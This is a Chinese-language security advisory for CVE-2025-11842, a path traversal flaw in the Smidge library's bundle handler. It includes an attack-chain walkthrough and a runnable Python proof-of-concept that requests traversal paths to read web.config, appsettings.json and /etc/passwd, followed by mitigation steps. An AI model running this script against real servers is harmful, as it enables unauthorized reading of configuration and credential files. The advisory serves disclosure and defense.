CVE-2025-11842：Shazwazza Smidge Bundle Handler路径遍历漏洞

漏洞信息

漏洞编号

CVE-2025-11842

漏洞类型

路径遍历（Path Traversal）

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Shazwazza Smidge

漏洞概述

CVE-2025-11842是Shazwazza Smidge（一个用于ASP.NET应用程序的JavaScript和CSS捆绑/压缩库）中存在的一个安全漏洞。该漏洞影响Smidge 4.5.1及以下版本，由vuldb.com的安全研究人员发现并报告，披露日期为2025年10月16日。

Smidge是一个流行的.NET资源捆绑管理工具，广泛应用于Umbraco CMS等基于ASP.NET的Web应用程序中。该漏洞存在于Smidge的Bundle Handler（捆绑处理器）组件中，攻击者可以通过操纵请求中的Version参数触发路径遍历攻击。由于该漏洞可以通过网络远程利用，且仅需要低权限认证即可执行，对使用Smidge库的Web应用程序构成了一定的安全威胁。

该漏洞的CVSS 3.1评分为6.3，属于中危级别。虽然单个漏洞的危害等级为中等，但考虑到Smidge在生产环境中被广泛部署，且路径遍历漏洞可能导致敏感文件读取、配置文件泄露甚至远程代码执行等更严重的攻击，因此建议相关用户尽快升级到修复版本4.6.0以消除风险。

技术细节

该漏洞的核心问题在于Shazwazza Smidge的Bundle Handler组件在处理请求参数时，未对用户输入的Version参数进行充分的验证和过滤。具体而言，当Smidge处理资源捆绑请求时，会根据传入的Version参数来确定资源版本和文件路径，攻击者可以通过构造包含路径遍历序列（如../）的恶意Version参数，绕过预期的目录限制，访问服务器上的任意文件。

从技术层面分析，攻击向量为网络攻击（AV:N），攻击复杂度低（AC:L），仅需要低权限认证（PR:L），无需用户交互（UI:N）。攻击成功后，攻击者可能读取Web服务器上的敏感配置文件、源代码、密钥文件等，导致机密性、完整性和可用性均受到低级别的影响（C:L/I:L/A:L）。

漏洞的利用方式相对简单：攻击者只需构造一个带有恶意Version参数的HTTP请求发送到Smidge的Bundle Handler端点，即可触发路径遍历。修复方案是将Smidge升级到4.6.0版本，该版本对Version参数的处理逻辑进行了安全加固，确保用户输入不能用于构造非法的文件路径。

攻击链分析

STEP 1

步骤1：信息收集

攻击者首先识别目标Web应用程序是否使用了Shazwazza Smidge库（版本≤4.5.1），通常通过检查JavaScript/CSS引用或响应头信息来确认。

STEP 2

步骤2：定位Bundle Handler端点

攻击者定位Smidge的Bundle Handler端点URL，通常为类似/Smidge/Bundle的路径，该端点负责处理资源捆绑请求。

STEP 3

步骤3：构造恶意请求

攻击者构造包含恶意Version参数的HTTP请求，在参数中嵌入路径遍历序列（如../../../），尝试访问服务器上的敏感文件。

STEP 4

步骤4：发送请求触发漏洞

攻击者将构造好的恶意请求发送到目标服务器，Smidge的Bundle Handler在处理Version参数时未进行充分验证，导致路径遍历成功。

STEP 5

步骤5：获取敏感信息

服务器返回被遍历访问的敏感文件内容，攻击者可能获取到Web配置文件、数据库连接字符串、API密钥等敏感信息。

STEP 6

步骤6：进一步利用

攻击者利用获取的敏感信息进行更深层次的攻击，如访问管理面板、提升权限或执行进一步的系统入侵。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11842 - Shazwazza Smidge Path Traversal PoC
# Affected: Shazwazza Smidge <= 4.5.1
# Component: Bundle Handler
# Vulnerable Parameter: Version

import requests

# Target configuration
TARGET_URL = "http://target-site.com"
BUNDLE_HANDLER_PATH = "/Smidge/Bundle"  # Default Smidge bundle handler path

def exploit_path_traversal(target_url, traversal_path):
    """
    Exploit path traversal via the Version parameter in Smidge Bundle Handler.
    The Version parameter is not properly sanitized, allowing directory traversal.
    """
    # Construct malicious Version parameter with path traversal sequence
    malicious_version = f"../../../../../../../../{traversal_path}"

    # Build the request URL
    exploit_url = f"{target_url}{BUNDLE_HANDLER_PATH}"

    # Parameters that trigger the vulnerable code path
    params = {
        "v": malicious_version,  # Version parameter
        "t": "css",              # Type: css or js
        "bundleName": "default"  # Bundle name
    }

    headers = {
        "User-Agent": "Mozilla/5.0",
        "Accept": "*/*"
    }

    try:
        response = requests.get(exploit_url, params=params, headers=headers, timeout=10)
        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response Length: {len(response.text)}")
        print(f"[*] Response Body:\n{response.text[:2000]}")
        return response
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None

if __name__ == "__main__":
    # Attempt to read sensitive files via path traversal
    target_files = [
        "web.config",
        "appsettings.json",
        "../web.config",
        "../../web.config",
        "../../../web.config",
        "windows/win.ini",
        "etc/passwd"
    ]

    print("[*] CVE-2025-11842 - Smidge Path Traversal Exploit")
    print("[*] Targeting Bundle Handler Version parameter\n")

    for target_file in target_files:
        print(f"\n[+] Attempting to read: {target_file}")
        result = exploit_path_traversal(TARGET_URL, target_file)
        if result and result.status_code == 200:
            print(f"[+] SUCCESS: File may have been retrieved!")
            break

影响范围

Shazwazza Smidge <= 4.5.1

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）在Web服务器层面配置访问控制，限制对Smidge Bundle Handler端点的未授权访问；2）部署WAF规则，拦截包含路径遍历特征的恶意请求；3）对Version参数进行服务端验证，确保其不包含特殊字符（如../、..\等）；4）最小化Smidge运行账户的文件系统权限，限制其可访问的目录范围；5）密切监控相关日志，及时发现异常访问行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11842
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11842
3 Details https://www.cvedetails.com/cve/CVE-2025-11842/
4 VulDB https://vuldb.com/cve/CVE-2025-11842
5 Link https://github.com/Shazwazza/Smidge/releases/tag/v4.6.0
6 Link https://github.com/asust9/smidge-vuln?tab=readme-ov-file
7 Link https://vuldb.com/?ctiid.328776
8 Link https://vuldb.com/?id.328776
9 Link https://vuldb.com/?submit.664905